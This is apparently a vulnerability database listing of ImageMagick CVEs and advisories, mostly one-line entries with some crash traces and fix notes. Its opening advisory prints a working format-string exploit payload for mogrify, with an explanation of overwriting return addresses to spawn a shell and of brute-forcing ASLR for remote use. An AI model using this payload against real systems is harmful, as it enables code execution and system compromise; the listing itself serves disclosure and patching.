00 00 00 fa fa 00 00 00 00 fa fa 0x0c067fff8020: 00 00 00 00 fa fa 00 00 00 00 fa fa 00 00 00 00 0x0c067fff8030: fa fa 00 00 00 00 fa fa 00 00 00 00 fa fa 00 00 0x0c067fff8040: 00 00 fa fa 00 00 00 00 fa fa 00 00 00 00 fa fa 0x0c067fff8050: 00 00 00 00 fa fa 00 00 00 00 fa fa 00 00 00 00 Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb ==55653==ABORTING ``` Processing a malicious filename containing format string specifiers such as %d%n results in corruption of the SplayTree structure stored in the r8 register. The corrupted structure contains invalid pointer values that are later dereferenced by the SplaySplayTree function, causing the function to access unintended memory locations and triggering a heap overflow condition. <br> ### 2. Shell execution tested on a local environment https://github.com/user-attachments/assets/00e6a091-8e77-48f0-959e-c05eff69ff94 ``` ~/fuzz gdb -nx -args ./patchedsecure/bin/mogrify %d%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%17995c%hn%c%c%c%c%c%c%c%c%c%65529c%hn%93659c%2176\$hn%233c%2194\$hhnaaaaaaaaa ``` The exploit achieves remote code execution by leveraging format string vulnerabilities to perform a write-what-where attack. The payload systematically overwrites return addresses on the stack, redirecting program execution to a one-gadget ROP chain that spawns a shell with the current process privileges. <br> **Exploitation Process:** 1. Format string payload corrupts stack pointers through positional parameters 2. Multiple 2-byte writes (%hn) progressively overwrite the return address 3. Final payload redirects execution to a one-gadget (0x00007ffff66ebc85) 4. One-gadget executes `/bin/sh` with inherited process permissions <br> **Remote Exploitation Feasibility:** While this PoC demonstrates local shell execution with ASLR disabled, remote code execution is achievable in real-world scenarios through brute force attacks. When stack layout conditions are favorable, attackers can perform 1.5-byte return address brute force and 1.5-byte libc base address brute force to gain shell access. <br> **Important:** The numeric parameters within the format string payload are environment-dependent and may require modification for different target systems due to variations in memory layout and stack structure. **Note:** This demonstrates complete system compromise, as the attacker gains interactive shell access to the target system. <br> ## Impact This format string vulnerability enables attackers to achieve complete system compromise through arbitrary memory read/write operations and remote code execution. Attackers can access sensitive data stored in process memory, overwrite critical system structures, and execute arbitrary code with ImageMagick's privileges. The vulnerability is particularly dangerous in web applications processing user-uploaded images and automated image processing systems. Successful exploitation can lead to privilege escalation, data exfiltration, and lateral movement within compromised networks. <br> ## Suggested Fix Two potential mitigation approaches: 1. **Input Validation**: Add format string validation in `InterpretImageFilename` to reject filenames containing format specifiers (`%n`, `%s`, `%x`, etc.) before passing to `FormatLocaleString` 2. **Safe Parsing**: Modify the format string processing to parse and validate each format specifier individually rather than passing the entire user-controlled string directly to `FormatLocaleString` <br> ## Credits ### Team Daemon Fuzz Hunters **Bug Hunting Master Program, HSpace/Findthegap** <br> **Woojin Park** @jin-156 [1203kids@gmail.com](mailto:1203kids@gmail.com) **Hojun Lee** @leehohojune [leehojune@korea.ac.kr](mailto:leehojune@korea.ac.kr) **Youngin Won** @amethyst0225 [youngin04@korea.ac.kr](mailto:youngin04@korea.ac.kr) **Siyeon Han** @hanbunny [kokosyeon@gmail.com](mailto:kokosyeon@gmail.com) # Additional notes from the ImageMagick team: On many modern toolchains and OSes, format‑string exploits using %n are already mitigated or blocked by default (e.g., -Wformat-security, _FORTIFY_SOURCE, hardened libc behavior, ASLR/stack canaries). That can make exploitation impractical in typical builds so you might not be vulnerable but it would still be wise to upgrade to the most recent version. We also already provide the following mitigation: To prevent unintended interpretation of the filename as a format string, users can explicitly disable format string parsing by defining the filename as a literal. This can be done using the following directive: - In wrappers: `filename:literal` - From the command line: `-define filename:literal=true` CVE-2025-55298
GHSA-9ccg-6pjw-x645
VCID-ra5y-ag3h-5yb8 Multiple vulnerabilities have been found in ImageMagick, the worst of which may allow remote attackers to cause a Denial of Service condition. CVE-2017-14248
VCID-raec-f3zw-bfdn ImageMagick: denial of service flaw in VICAR file processing CVE-2015-8903
VCID-ray4-6nnk-93f7 security update CVE-2014-1958
VCID-rbdg-vz8x-ykah ImageMagick has heap use-after-free in the MSL encoder A heap-use-after-free vulnerability exists in the MSL encoder, where a cloned image is destroyed twice. The MSL coder does not support writing MSL so the write capability has been removed. ``` SUMMARY: AddressSanitizer: heap-use-after-free MagickCore/image.c:1195 in DestroyImage Shadow bytes around the buggy address: 0x0a4e80007450: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd 0x0a4e80007460: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd 0x0a4e80007470: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd 0x0a4e80007480: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd 0x0a4e80007490: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd =>0x0a4e800074a0: fd fd fd fd fd fd fd fd fd fd[fd]fd fd fd fd fd 0x0a4e800074b0: fd fd fd fd fd fd fd fd fd fa fa fa fa fa fa fa 0x0a4e800074c0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0a4e800074d0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0a4e800074e0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0a4e800074f0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa ``` CVE-2026-28688
GHSA-xxw5-m53x-j38c
VCID-rbgb-rbtn-eqff security update CVE-2016-10051
VCID-rf1t-45cj-mue1 Multiple vulnerabilities have been found in ImageMagick, the worst of which may allow remote attackers to cause a Denial of Service condition. CVE-2017-14173
VCID-rghj-fgdd-nke7 ImageMagick: heap-based buffer overflow in ReadTIM2ImageData() function in coders/tim2.c CVE-2023-34474
VCID-rhpj-r7ym-7kdn ImageMagick: Memory leak in coders/dcm.c:ReadDCMImage can allow for denial of service CVE-2018-6405
VCID-rj9n-ra1t-77dy ImageMagick has stack buffer overflow in MagnifyImage MagnifyImage uses a fixed-size stack buffer. When using a specific image it is possible to overflow this buffer and corrupt the stack. CVE-2026-30929
GHSA-rqq8-jh93-f4vg
VCID-rjkf-pdny-2fhn ImageMagick vulnerable to stack corruption through long morphology kernel names or arrays A stack buffer overflow exists in ImageMagick's morphology kernel parsing functions. User-controlled kernel strings exceeding a buffer are copied into fixed-size stack buffers via memcpy without bounds checking, resulting in stack corruption. CVE-2026-28494
GHSA-932h-jw47-73jm
VCID-rm64-smat-8kfw ImageMagick: out-of-bounds memory error in DCM decode CVE-2014-8562
VCID-rmg9-7tdv-eyh4 ImageMagick: incorrect error handling in sun files CVE-2014-9826
VCID-rqdx-1pdv-a3bu security update CVE-2019-13304
VCID-rqm7-d751-myfa security update CVE-2019-15140
VCID-rrvd-vd81-sfdm Multiple vulnerabilities have been discovered in ImageMagick, the worst of which can lead to remote code execution. CVE-2022-28463
VCID-ru3u-g5g8-zbcn ImageMagick: incorrect boundary checks in DecodePSDPixels CVE-2014-9843
VCID-ruf5-255v-sfdb ImageMagick: Out of bounds read in multiple coders read raw pixel data A heap buffer over-read vulnerability exists in multiple raw image format handles. The vulnerability occurs when processing images with -extract dimensions larger than -size dimensions, causing out-of-bounds memory reads from a heap-allocated buffer. CVE-2026-25576
GHSA-jv4p-gjwq-9r2j
VCID-rvjq-uks4-x3h3 ImageMagick: a "use of uninitialized value" vulnerability in the function ReadCUTImage leading to a crash and DoS CVE-2019-13135
VCID-rwat-s4hf-v7bv security update CVE-2017-9500
VCID-rwnm-ssex-tfgr ImageMagick: excessive CPU use DoS by processing JPEG images with crafted restart markers CVE-2012-0260
VCID-rxgw-h3br-b7dy ImageMagick: Memory leak in the ReadOnePNGImage() function CVE-2017-11539
VCID-rypf-qy6p-3bac ImageMagick: heap-based buffer over-read in SetGrayscaleImage in the quantize.c CVE-2018-11625
VCID-ryu7-2nsu-kqf6 ImageMagick: infinite loop in coders/bmp.c CVE-2018-20467
VCID-rzge-64xp-bfej imagemagick: use of uninitialised value in function WriteJP2Image in coders/jp2.c CVE-2019-12977
VCID-rzs6-gp7c-vqhc ImageMagick: Memory leak in the ReadMNGImage function CVE-2017-9261
VCID-rzvc-hba1-zfcy ImageMagick: Information leak in ReadXBMImage in coders/xbm.c CVE-2018-16323
VCID-rzz2-km3v-b3hw ImageMagick: infinite loop in ReadMIFFImage function in coders/miff.c CVE-2017-18271
VCID-rzzk-7g6m-3yfp ImageMagick: use of uninitialized memory in RLE decoder CVE-2017-9098
VCID-s293-ewpe-3ufa ImageMagick: handling of corrupted of xpm file CVE-2014-9827
VCID-s4cu-swuc-9fh4 ImageMagick: Missing NULL check in the ReadMATImage function CVE-2017-13658
VCID-s4p8-s262-fqfx ImageMagick: Infinite loop in ReadPSDChannelZip function in coders/psd.c CVE-2017-17681
VCID-s543-mazj-fqfd ImageMagick: memory leak vulnerability in the function ReadMATImage in coders/mat.c CVE-2017-17881
VCID-s6bw-85wn-jygp ImageMagick: Heap-buffer overflow in IsPixelGray in pixel-accessor.h (Incomplete fix for CVE-2016-9556) CVE-2016-9773
VCID-s747-5kgj-pqeh ImageMagick: Memory leak in the ReadXWDImage function CVE-2017-8352
VCID-s7tx-uu27-xqb5 security update CVE-2019-13300
VCID-sat2-d6u2-f3c9 security update CVE-2017-11449
VCID-sd54-b8z1-2fg7 ImageMagick: Integer overflow or wraparound and incorrect conversion between numeric types in the internal SVG decoder A crafted SVG file can cause a denial of service. An off-by-one boundary check (`>` instead of `>=`) that allows bypass the guard and reach an undefined `(size_t)` cast. CVE-2026-25989
GHSA-7355-pwx2-pm84
VCID-sdc2-fcap-abaz ImageMagick has Heap Out-of-Bounds Read in DCM Decoder (ReadDCMImage) A heap out-of-bounds read vulnerability exists in the `coders/dcm.c` module. When processing DICOM files with a specific configuration, the decoder loop incorrectly reads bytes per iteration. This causes the function to read past the end of the allocated buffer, potentially leading to a Denial of Service (crash) or Information Disclosure (leaking heap memory into the image). CVE-2026-25982
GHSA-pmq6-8289-hx3v
VCID-sdw2-cg48-b3fd security flaw CVE-2005-1275
VCID-sdwh-3s12-17fr ImageMagick: CPU exhaustion vulnerability in function ReadDDSInfo in coders/dds.c CVE-2017-1000476
VCID-shzj-77rr-n3g4 ImageMagick: out of bound access in palm file CVE-2014-9840
VCID-sj8x-sdpv-rkfy security update CVE-2016-7528
VCID-smpj-hz7t-8bhq ImageMagick: Memory leak in the ReadBMPImage function CVE-2017-8354
VCID-smtf-q6g7-fqen ImageMagick: Memory leak in the ReadEPTImage function CVE-2017-8357
VCID-snup-2hn7-sue2 ImageMagick: heap-based buffer overflow in MagickCore/fourier.c in ComplexImage CVE-2019-13308
VCID-spch-fffg-4yc5 Withdrawn Advisory: ImageMagick has a use-after-free/double-free risk in Options::fontFamily when clearing family ## Withdrawn Advisory This advisory has been withdrawn because it does not affect the ImageMagick project's NuGet packages. ### Original Description We believe that we have discovered a potential security vulnerability in ImageMagick’s Magick++ layer that manifests when `Options::fontFamily` is invoked with an empty string. **Vulnerability Details** - Clearing a font family calls `RelinquishMagickMemory` on `_drawInfo->font`, freeing the font string but leaving `_drawInfo->font` pointing to freed memory while `_drawInfo->family` is set to that (now-invalid) pointer. Any later cleanup or reuse of `_drawInfo->font` re-frees or dereferences dangling memory. - `DestroyDrawInfo` and other setters (`Options::font`, `Image::font`) assume `_drawInfo->font` remains valid, so destruction or subsequent updates trigger crashes or heap corruption. ```cpp if (family_.length() == 0) { _drawInfo->family=(char *) RelinquishMagickMemory(_drawInfo->font); DestroyString(RemoveImageOption(imageInfo(),"family")); } ``` - **CWE-416 (Use After Free):** `_drawInfo->font` is left dangling yet still reachable through the Options object. - **CWE-415 (Double Free):** DrawInfo teardown frees `_drawInfo->font` again, provoking allocator aborts. **Affected Versions** - Introduced by commit `6409f34d637a34a1c643632aa849371ec8b3b5a8` (“Added fontFamily to the Image class of Magick++”, 2015-08-01, blame line 313). - Present in all releases that include that commit, at least ImageMagick 7.0.1-0 and later (likely late 6.9 builds with Magick++ font family support as well). Older releases without `fontFamily` are unaffected. **Command Line Triggerability** This vulnerability cannot be triggered from the command line interface. The bug is specific to the Magick++ C++ API, specifically the `Options::fontFamily()` method. The command-line utilities (such as `convert`, `magick`, etc.) do not expose this particular code path, as they operate through different internal mechanisms that do not directly call `Options::fontFamily()` with an empty string in a way that would trigger the use-after-free condition. **Proposed Fix** ```diff diff --git a/Magick++/lib/Options.cpp b/Magick++/lib/Options.cpp @@ void Magick::Options::fontFamily(const std::string &family_) - _drawInfo->family=(char *) RelinquishMagickMemory(_drawInfo->font); + _drawInfo->family=(char *) RelinquishMagickMemory(_drawInfo->family); ``` This frees only the actual family string, leaving `_drawInfo->font` untouched. Optionally nulling `_drawInfo->font` when clearing `font()` itself maintains allocator hygiene. CVE-2025-65955
GHSA-q3hc-j9x5-mp9m
VCID-sr4g-yz6w-ebfk security update CVE-2016-10055
VCID-sw7g-hxxr-n3e1 ImageMagick has a Path Policy TOCTOU symlink race bypass `domain="path"` authorization is checked before final file open/use. A symlink swap between check-time and use-time bypasses policy-denied read/write. CVE-2026-28689
GHSA-493f-jh8w-qhx3
VCID-swqu-wape-83bj ImageMagick: heap-buffer-overflow in coders/tiff.c CVE-2023-3428
VCID-sy2v-5ufy-sfc4 ImageMagick: Integer overflow in WriteTHUMBNAILImage of coders/thumbnail.c CVE-2021-20312
VCID-sywj-rqp4-23dd security update CVE-2016-10050
VCID-sz6p-kkuh-fkeu security flaw CVE-2005-0005
VCID-szhs-nysy-6bap ImageMagick: memory leak for a colormap in WriteMPCImage in coders/mpc.c CVE-2018-14434
VCID-t2pe-etah-1bh3 ImageMagick: memory leaks in AcquireMagickMemory function CVE-2020-27753
VCID-t38m-c4zf-yqe6 Multiple vulnerabilities have been discovered in ImageMagick, the worst of which can lead to remote code execution. CVE-2023-2157
VCID-t4gn-rwz1-ykcf ImageMagick: Memory leak in ReadPESImage function in coders/pes.c CVE-2017-12433
VCID-t75h-4xfn-h7cd ImageMagick: Memory leak in the ReadPALMImage function CVE-2017-9407
VCID-t9u8-a55c-xqhr Multiple vulnerabilities have been found in ImageMagick, the worst of which allows remote attackers to execute arbitrary code. CVE-2017-5506
VCID-ta5n-gyp1-c3dk ImageMagick: Memory leak in the ReadPICTImage function CVE-2017-8353
VCID-tc3z-912z-afc8 ImageMagick: division by zero in RemoveDuplicateLayers in MagickCore/layer.c CVE-2019-13454
VCID-tdsq-gc81-hqda security update CVE-2016-10062
VCID-thbh-m54e-z7ca Multiple vulnerabilities have been found in ImageMagick, the worst of which may allow remote attackers to cause a Denial of Service condition. CVE-2017-14249
VCID-tm56-q7ka-ukft ImageMagick: Division by zero in WriteJP2Image() in coders/jp2.c CVE-2021-20241
VCID-tms4-1k6m-cqgd Multiple vulnerabilities have been found in ImageMagick, the worst of which may allow remote attackers to cause a Denial of Service condition. CVE-2017-13143
VCID-tn11-bwg6-m3e3 ImageMagick: outside the range of representable values of type 'int' at MagickCore/quantize.c CVE-2020-27759
VCID-tnb2-7mvf-sqdk security update CVE-2018-11251
VCID-tnnn-bg52-93a9 ImageMagick: memory leak in WritePCXImage in coders/pcx.c CVE-2018-18016
VCID-tqu8-qq9b-gkev ImageMagick: Memory leak in the ReadEXRImage function CVE-2017-8347
VCID-trt9-1y65-53en imagemagick: NULL pointer dereference in MagickCore component can lead to a denial of service CVE-2017-1000445
VCID-tspc-ndj7-37h5 security flaw CVE-2005-0761
VCID-tv15-dcnu-pbbn ImageMagick: Heap overflow in pcd decoder leads to out of bounds read. The pcd coder lacks proper boundary checking when processing Huffman-coded data. The decoder contains an function that has an incorrect initialization that could cause an out of bounds read. ``` ==3900053==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x502000003c6c at pc 0x55601b9cc552 bp 0x7ffd904b1f70 sp 0x7ffd904b1f60 READ of size 1 at 0x502000003c6c thread T0 ``` CVE-2026-26284
GHSA-wrhr-rf8j-r842
VCID-tv6b-u42h-xkh2 ImageMagick: Memory leak in ReadOneJNGImage CVE-2017-15218
VCID-tvzz-994x-xbcc ImageMagick: Write path does not check return of fputc in magick-cli.c CVE-2016-10060
VCID-tw4r-9r9b-4qez imagemagick: ImageMagick: heap-buffer overflow CVE-2025-55005
VCID-twq8-ntkg-zbfk ImageMagick: Memory leak in the WriteDIBImage function in coders/dib.c CVE-2019-7398
VCID-txaa-zcha-wbbv security update CVE-2016-10052
VCID-txgd-58rj-73a3 Multiple vulnerabilities have been found in ImageMagick, the worst of which allows remote attackers to execute arbitrary code. CVE-2016-9298
VCID-tzpa-13fk-7kc9 ImageMagick: missing check for fputc function in multiple files CVE-2018-16643
VCID-u1fg-v9f6-z7ev ImageMagick: heap overflow in pnm files CVE-2014-9821
VCID-u23c-4px5-c3g9 security update CVE-2017-11188
VCID-u29f-6tep-cfdr ImageMagick: Memory leak in the ReadJNGImage function CVE-2017-8350
VCID-u45q-eheh-6kak ImageMagick: Incorrect Calculation of Buffer Size in ImageMagick's Multispectral MIFF Processing CVE-2025-46393
VCID-u6vb-tewy-fkda ImageMagick: memory leaks in ResizeMagickMemory function in ImageMagick/MagickCore/memory.c CVE-2020-27755
VCID-u7dc-kx3v-4ffz ImageMagick: Off-by-one count when parsing an 8BIM profile CVE-2014-9915
VCID-u9gb-ppd4-3fd5 ImageMagick: possible read or write in postscript files CVE-2021-39212
VCID-u9um-rar7-97e8 ImageMagick: NULL pointer dereference in PDFDelegateMessage CVE-2017-15015
VCID-u9v8-n717-fyag ImageMagick: infinite loop in the ReadBMPImage function of the coders/bmp.c CVE-2018-18024
VCID-uatu-64df-b7b8 security update CVE-2017-14989
VCID-uayc-3r68-tudp ImageMagick: Memory leak in the ReadXCFImage function CVE-2017-14343
VCID-uc6k-xc2v-kbas security update CVE-2016-10046
VCID-ucfp-qqy4-jqdm ImageMagick: outside the range of representable values of type 'unsigned long long' at MagickCore/quantum-private.h CVE-2020-27757
VCID-uf32-kpa6-fqe5 Multiple vulnerabilities have been found in ImageMagick, the worst of which allows remote attackers to execute arbitrary code. CVE-2017-5508
VCID-uhe3-t6mw-ckd2 ImageMagick: Magick_png_malloc() size argument CVE-2012-3437
VCID-ujad-kteu-sfdu ImageMagick: stack overflow in coders/tiff.c while parsing malicious tiff file CVE-2023-3195
VCID-umnw-ksa8-9ua8 ImageMagick: excessive iteration in the DecodeLabImage and EncodeLabImage functions in coders/tiff.c CVE-2018-9133
VCID-upce-8s7m-2kfk ImageMagick: Memory leak in WritePALMImage function in coders/palm.c CVE-2017-12664
VCID-ur14-3rbn-j3ev ImageMagick: heap-based buffer over-read in the SVGStripString function of coders/svg.c CVE-2018-18023
VCID-ur3j-m1rh-q3dn ImageMagick: out-of-bounds memory error in JPEG decoder CVE-2014-8716
VCID-urv8-ve9y-e3b4 ImageMagick: Memory-Leak in ReadMATImage() coders/mat.c CVE-2017-11644
VCID-ury3-3x4b-1qh2 ImageMagick: NULL pointer dereference in BenchmarkOpenCLDevices in MagickCore/opencl.c CVE-2017-18210
VCID-utfe-h3b7-jqcj ImageMagick: MSL - Stack overflow in ProcessMSLScript ### Summary Magick fails to check for circular references between two MSLs, leading to a stack overflow. ### Details After reading a.msl using magick, the following is displayed: `MSLStartElement` -> `ReadImage` -> `ReadMSLImage` -> `ProcessMSLScript` -> `xmlParseChunk` -> `xmlParseTryOrFinish` -> `MSLStartElement` ```bash AddressSanitizer:DEADLYSIGNAL ================================================================= ==114345==ERROR: AddressSanitizer: UNKNOWN SIGNAL on unknown address 0x000000000000 (pc 0x72509fc7d804 bp 0x7ffd6598b390 sp 0x7ffd6598ab20 T0) #0 0x72509fc7d804 in strlen ../../../../src/libsanitizer/sanitizer_common/sanitizer_common_interceptors.inc:388 [...] ``` CVE-2026-25971
GHSA-8mpr-6xr2-chhc
VCID-utsb-dc1p-jkcq ImageMagick: heap-use-after-free in at dcm.c RelinquishDCMMemory CVE-2021-3962
VCID-uvpj-a8v5-ebgz Image Magick has a Memory Leak in coders/ashlar.c Memory leak exists in `coders/ashlar.c`. The `WriteASHLARImage` allocates a structure. However, when an exception is thrown, the allocated memory is not properly released, resulting in a potential memory leak. ``` ```bash ==78968== Memcheck, a memory error detector ==78968== Copyright (C) 2002-2022, and GNU GPL'd, by Julian Seward et al. ==78968== Using Valgrind-3.22.0 and LibVEX; rerun with -h for copyright info ==78968== ==78968== HEAP SUMMARY: ==78968== in use at exit: 17,232 bytes in 4 blocks ==78968== total heap usage: 4,781 allocs, 4,777 frees, 785,472 bytes allocated ``` CVE-2026-25969
GHSA-xgm3-v4r9-wfgm
VCID-uwbu-vzay-q3ak ImageMagick: NULL pointer dereference in GetMagickProperty function in MagickCore/property.c CVE-2018-16329
